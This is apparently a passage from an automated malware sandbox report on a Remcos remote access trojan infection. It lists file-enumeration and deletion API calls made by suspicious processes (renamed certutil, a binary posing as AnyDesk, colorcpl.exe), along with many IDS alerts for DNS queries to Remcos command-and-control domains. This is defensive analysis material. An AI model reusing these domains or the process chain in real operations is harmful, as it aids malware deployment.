Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	3_2_00007FF7823E2978
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	3_2_00007FF7823E823C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,	3_2_00007FF7823F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	3_2_00007FF7823D1560
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	3_2_00007FF7823D35B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF7823E2978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF7823E823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF7823F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF7823D1560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF7823D35B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	6_2_00007FF6A2AA234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	6_2_00007FF6A2A3C6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	6_2_00007FF6A2AA6F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF6A2AA10C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF6A2AA3100
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF6A2A4B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A0D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A0D440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	6_2_00007FF6A2A4D4A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A83674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	6_2_00007FF6A2A83674
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	6_2_00007FF6A2A4DBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA19F8 #359,FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF6A2AA19F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	6_2_00007FF6A2AA1B04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A45E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	6_2_00007FF6A2A45E58
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	9_2_02AA5908
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF7823E2978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF7823E823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF7823F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF7823D1560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF7823D35B8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	11_2_00007FF7823E2978
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	11_2_00007FF7823E823C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,	11_2_00007FF7823F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	11_2_00007FF7823D1560
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	11_2_00007FF7823D35B8
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00860207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	16_2_00860207
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0086589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	16_2_0086589A
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00864EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	16_2_00864EC1
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00873E66 FindFirstFileW,FindNextFileW,FindClose,	16_2_00873E66
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0085532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	16_2_0085532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_0040928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	19_2_0041C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	19_2_0040C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_004096A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	19_2_00408847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00407877 FindFirstFileW,FindNextFileW,	19_2_00407877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	19_2_0040BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,	19_2_00419B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	19_2_0040BD72
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F485AE FindFirstFileW,FindNextFileW,	19_2_06F485AE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4A3D7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_06F4A3D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4CAA9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	19_2_06F4CAA9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5A8BD FindFirstFileW,	19_2_06F5A8BD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4C8A2 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	19_2_06F4C8A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4957E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	19_2_06F4957E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4D0BF FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	19_2_06F4D0BF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5D059 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	19_2_06F5D059
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F49FC5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_06F49FC5

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

19_2_00407CD2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:59343 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:58194 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:53547 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:62093 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:61155 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60974 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50236 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:64562 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:58067 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:65535 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60471 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:57490 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:61257 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51070 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:57310 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51083 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:65126 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53613 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51046 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:56437 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51516 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52810 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052853 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (myumysmeetr .ddns .net) : 192.168.2.4:58098 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63256 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51596 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:64085 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53910 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:54616 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51686 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:57528 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:64170 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:56769 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58691 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:53764 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:64835 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:52245 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:55983 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:60083 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:62933 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:59056 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63380 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53097 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63585 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:58645 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63067 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:54580 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56146 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56028 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:61391 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:62782 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:50244 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:52634 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56631 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:63586 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52231 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:65098 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:49844 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:61809 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53224 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:49263 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:64192 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51352 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:60693 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51362 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:58629 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:50667 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:49950 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58377 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56732 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51471 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:64574 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:49395 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58242 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:57891 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:54755 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:59365 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:64866 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:49957 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:58989 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:55617 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:59617 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51118 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58303 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56438 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:54689 -> 1.1.1.1:53
